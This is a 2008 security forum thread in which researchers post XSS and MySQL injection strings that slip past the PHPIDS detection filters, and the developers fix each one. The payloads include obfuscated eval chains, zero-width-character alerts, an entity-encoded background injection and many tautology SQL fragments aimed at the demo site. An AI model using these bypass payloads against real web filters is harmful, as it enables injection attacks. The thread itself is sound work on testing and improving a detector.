Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1314151617181920212223...LastNext
Current Page: 18 of 31
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 07, 2008 03:23AM

That's well right - 'twas too late yesterday evening to remember that :)

But anyway - base64 is still a big problem - unclear to solve. I will do some 'fun experiments' this evening hoping to find a way to deal with those issues. But I am sure there won't be something bulletproof against data URLs since the encoding can be chosen rather arbitrarily: http://h4k.in/dataurl

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 07, 2008 04:10AM

@mario

You seem to have protected well against data: injection, I tried MANY combinations to defeat the reg exps including mixing entities and control characters. So I guess it isn't a problem unless it can be bypassed. I would suggest making data: url's a higher impact though.

For reference I've found the data: works on Safari, Firefox and Opera.

Please continue your fun experiments :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: christ1an
Date: February 08, 2008 07:49AM

rsnake Wrote:
-------------------------------------------------------
> I'm by no way disparaging your work. I'm only
> saying I think this is the wrong approach.
> Blacklists have been proven to fail for 17 pages.
> Which page do we need to get to before everyone
> agrees? So far everyone is saying it can't be
> done (I agree) - and to me that is the definition
> of the wrong approach, or at minimum the least
> attractive option.
>
> I promise, I'm not trying to stir the pot here,
> I'm honestly concerned that I'm not getting why
> you guys are so gung-ho about a project that is
> unlikely to be bulletproof at serving it's primary
> function. What am I missing? Is stopping script
> kiddies enough? If so, I get it - but I thought
> there was a greater goal.

I'm happy you wrote this. Actually, you and some others are missing something here indeed.

I don't need to argue with you or any of you guys about the effectiveness of blacklist approaches. As a matter of fact, blacklists are always buggy - by design. You cannot stop anyone from injecing malicious code with them.

> about a project that is unlikely to be bulletproof at serving it's primary function.

So what is the primary function of PHPIDS? As .mario alreay mentioned, we are not trying to build a webapp shield here at all. We are just trying to detect malicious actions taken on websites. Thats all. And thats also why I (not necessarily everyone behind PHPIDS) absolutely agree with you that the last 10 or so pages somehow lost track of our primary objective.

One step back. I consider PHPIDS a very good attack detection system, not only for a few days but for 10 pages. PHPIDS accomplished it's aim the moment it required tremendously skilled javascript magicians to be "broken".

Have you ever tried breaking into something by firstly injecting:

s=/x/
$s=.1?'ev':a
$s=.0?.1: $s+'al(loc'
$s=.0?.1: $s+'ation.h'
$s=.0?.1: $s+'ash) '
s.s=''. eval
s.s($s)

... instead of something like '>"><script>alert(1)</script>? I guess not. The point is, PHPIDS will not only detect trivial fragments like '>"><script>alert(1)</script>, which is clearly an XSS attempt, but also a variety of more complicated ones. The latter of course thanks to the last 10 pages; so I'm not saying those were in vain or a waste of time.

PHPIDS is very good in what it was intended to do and it's being improved as we speak. Coming back to blacklists - in this particular case, blacklists are simply a sufficient solution to the problem we faced at the beginning. Thats it, absolutely nothing has failed ;)

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 11, 2008 08:43AM

Hey!

I just added basic detection and translation for nested base64 payload. Gareth - it's on! :)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 07:37AM

@mario

I had another quick play with the IDS, it's good :D

However I'd recommend that constructors and prototypes should be blocked, because global functions can reference the current window and also create functions. Take the example below which isn't a exploit of PHPIDS but shows how to create functions through constructors.

x=print.constructor
x=x(/x=alert/[-1])
x()
x(1)

So for example IMO these should be blocked as well:-
print()
moveBy(100,100)
resizeTo(0,0)

etc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 07:41AM

Here's a trick to get the current window even though it's a XPconnect object:-

x=print.__parent__
x=x['alert']
x(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 08:58AM

Here's a new one :D

You need to click on the links though:-
ale&zwj;rt(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 09:09AM

ale&zwnj;rt(1)
aler&lrm;t(1)
aler&rlm;t(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 13, 2008 09:16AM

@Garteh: I absolutely agree and will make those changes ASAP.

&rlm; <- WTF!? Great job - thx!

:)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 10:33AM

If I had time I may have been able to turn this into a working XSS hole:-

<table background=&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000006a&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000076&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000073&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000063&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000072&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000069&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000070&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000074&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000003a&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000006c&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000065&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000072&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000074&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000028&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000031&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000029>

Tested in Opera and the injected tag isn't detected in the IDS, possibly could work in IE but I've not tried.

Impact rating of 16,

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 13, 2008 10:39AM

Hmmm - I don't know if it makes sense to check on tables - since you can use a lot more elements for background injections. I'd rather propose to check for the background attribute.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 13, 2008 10:40AM

Yeah agreed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: February 17, 2008 09:27AM

+alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: February 17, 2008 11:26AM

Fixx0r3d - small bug in the UTF7 converter (even if that explanation sounds weird *g*)

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: thornmaker
Date: February 17, 2008 10:06PM

thanks for the tip Gareth and .mario: http://p42.us/phpids/59.html
ACM=1,1+eval(1+name+(+ACM-1),ACM)

[edit]
I mistakenly thought the above injection was due to an error in the converter dealing with utf-7. I guess not since this injection gets through as well (24 chars): http://p42.us/phpids/60.html
1+eval(1+name+(+1-1),-1)



Edited 3 time(s). Last edit at 02/17/2008 10:20PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: Gareth Heyes
Date: February 18, 2008 02:37AM

@thornmaker

Awesome :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: Anonymous User
Date: February 18, 2008 02:59AM

Hehe - nice indeed! I realized that the mb_convert_encoding stuff is to handle with great care and narrowed the conditions a little bit. Plus the possible UTF7 is now being decoded and attached - not used as replacement for the whole string. Thx!

I think I will release 0.4.7 tomorrow - any pleas?

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: Reiners
Date: February 18, 2008 03:04PM

1'*column-0-'0 (php-ids)
1'*column-false-'0 (php-ids)
1'*column-0|'0 (php-ids)
1'-column!=-column-'0 (php-ids)
1'-column!=-column|'0 (php-ids)

1'-@a or'1 (php-ids)
a'-@a=@a or'1 (php-ids)

greetings :)

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: thornmaker
Date: February 18, 2008 03:43PM

fun stuff Reiners!

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: Reiners
Date: February 18, 2008 06:47PM

;) yep

the above vector works with different operands of course (aa'^@a or'1 and so on)

edit:
aa'LIKE('aa')|'1 (php-ids)

edit:
aa' *@var or 1 SOUNDS LIKE (1)|'1 (php-ids)
aa' *@var or 1 RLIKE (1)|'1

edit:
a' or~column like ~1|'1 (php-ids)



Edited 7 time(s). Last edit at 02/18/2008 07:41PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.7 is close...)
Posted by: Anonymous User
Date: February 19, 2008 03:28PM

Hi Reiners

Nice ones... thx. Fixed!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: February 21, 2008 03:34AM

workarounds for the last fixes ;). remember that MySQL syntax allows as many operands, spaces, brackets and prefixes as you want and where you want.

aa'LIKE('aa')|-'1 http://demo.php-ids.org/?test=aa'LIKE('aa')%7c-'1
a' or ~ column like ~1|(1)#a http://demo.php-ids.org/?test=a'%20or%20~%20column%20like%20~1%7c(1)%23a
aa' * @var or-1 SOUNDS LIKE (1)|-'1 http://demo.php-ids.org/?test=aa'%20*%20@var%20or-1%20SOUNDS%20LIKE%20(1)%7c-'1
aa' * @var or-(1) = -'1 http://demo.php-ids.org/?test=aa'%20*%20@var%20or-(1)%20=%20-'1
1'-@a or-(1)=-'1 http://demo.php-ids.org/?test=1'-@a%20or-(1)=-'1
a' - @a = @a or-(1)=-'1 http://demo.php-ids.org/?test=a'%20-%20@a%20=%20@a%20or-(1)=-'1

1'*column-(0)-'0 http://demo.php-ids.org/?test=1'*column-(0)-'0
1' * column - (false) - '0 http://demo.php-ids.org/?test=1'%20*%20column%20-%20(false)%20-%20'0
1'*column-0|-'0 http://demo.php-ids.org/?test=1'*column-0%7c-'0
1'-column!=-(column)-'0 http://demo.php-ids.org/?test=1'-column!=-(column)-'0
1'-column!=-column|-'0 http://demo.php-ids.org/?test=1'-column!=-column%7c-'0

(they are mainly using all the same little filter bug with a prefix infront of the last number or brackets around another operand)

MfG :)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: February 21, 2008 05:34AM

@reiners

Very cool! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: fragge
Date: February 21, 2008 08:09PM

As interesting as this topic is, your PHPIDS is 1000% oversensitive. It detects usage of closing bold and italic tags? It raises flags over the use of a perfectly fine hyperlink or image tag, and calls it javascript injections? I thought that this was supposed to allow non-malicious code to operate, whilst filtering malicious code. Blacklisting character sets does not work. Some pretty tricky xxs injections tho Gareth :)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: tx
Date: February 21, 2008 08:15PM

@fragge: PHPIDS isn't supposed to filter anything. It only detects and then assigns it a an impact value. Based on that value certain actions can be triggered.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: fragge
Date: February 21, 2008 09:31PM

So if I pad my document with hundreds of <b><i> and </i></b>, and raise the severity warning, will my document be cancelled? I don't understand the point of this.. it doesn't allow for actual usability.. It just stops any injection.. Which there wouldn't be if we removed the form in the first place - something this thing practically does by blacklisting anything with <> or ' zzz.. using script not only pulls up the "possibly malicious html element" filter, but it also somehow brings up the obfuscation filter as well, despite the obvious fact that no obfuscation has been done. In the hands of a retarded web master, everything will be blocked and their forms will be useless. ._.

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 22, 2008 09:24AM

@fragge: The thing is - as tx mentioned correctly: The PHPIDS is not supposed to check on user input where the developer expects or even demands HTML - like from WYSIWYG editors or comparable. It doesn't make sense to monitor such input but just pump it through a well configured HTMLPurifier instance. You can easily exclude those fields by adding them to the include list via Config.ini or dynamically.

The PHPIDS takes care of all the rest - which I believe to be about 99% of all fired requests on a nowadays webapp. The whole system is pretty much designed for very large webapps and it performs well on those.

@Reiners: Nice circumventions ;) Will take care of them asap!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: February 23, 2008 01:11PM

hey .mario, new workarounds of the last fixes for you:

aa'LIKE('aa')-'-1 http://demo.php-ids.org/?test=aa'LIKE('aa')-'-1
a' or ~ column like 1|-'1 http://demo.php-ids.org/?test=a'%20or%20~%20column%20like%201%7c-'1
aa' * @var -1 or 1 SOUNDS LIKE (1)|'-1 http://demo.php-ids.org/?test=aa'%20*%20@var%20-1%20or%201%20SOUNDS%20LIKE%20(1)%7c'-1
1'*+column-(0)-'-0 http://demo.php-ids.org/?test=1'*+column-(0)-'-0
1'*+column-(false)-'-0 http://demo.php-ids.org/?test=1'*%2bcolumn-(false)-'-0
1'*+column-0|-'-0 http://demo.php-ids.org/?test=1'*%2bcolumn-0%7c-'-0
1'-column!=-(column)-'-0 http://demo.php-ids.org/?test=1'-column!=-(column)-'-0
1'-column!=-column|-'-0 http://demo.php-ids.org/?test=1'-column!=-column%7c-'-0
1'-id-(@a)or-1='-1 http://demo.php-ids.org/?test=1'-id-(@a)or-1='-1
aa'*(@var)or(-1)='-1 http://demo.php-ids.org/?test=aa'*(@var)or(-1)='-1

most of them uses the trick that you can use a prefix in front of the last operand behind the last bracket plus some other prefix/brackets/spaces/operands to pass it around the filters. so its not really that much new stuff ;)

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: February 23, 2008 01:49PM

Nices ones again - kay, the "\w at the end was pretty senseless ;) Thx!

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Reiners
Date: February 23, 2008 03:27PM

1'*(@a)or(1)LIKE'1 http://demo.php-ids.org/?test=1'*(@a)or(1)LIKE'1
1'*id LIKE(1)+'1 http://demo.php-ids.org/?test=1'*id%20LIKE(1)%2b'1
aa'*@var -1 or 1 SOUNDS LIKE(1)|'+1 http://demo.php-ids.org/?test=aa'*@var%20-1%20or%201%20SOUNDS%20LIKE(1)%7c'%2b1
1'*column+0+ ' +0 http://demo.php-ids.org/?test=1'*column%2b0%2b%20'%20%2b0
1'+column or 1 LIKE '1 http://demo.php-ids.org/?test=1'%2bcolumn%20or%201%20LIKE%20'1
1'-column!=-column%7c- ' -0 http://demo.php-ids.org/?test=1'-column!=-column%7c-%20'%20-0


most of them work with a "+" instead of a "-". The prefix actually doesnt matter, I just use to try with "-" because "+" is often used in javascript injections and I don't have to url encode it ;). maybe that was confusing. Plus I often used some spaces near the quote.

Options: ReplyQuote
Pages: PreviousFirst...1314151617181920212223...LastNext
Current Page: 18 of 31


Sorry, only registered users may post in this forum.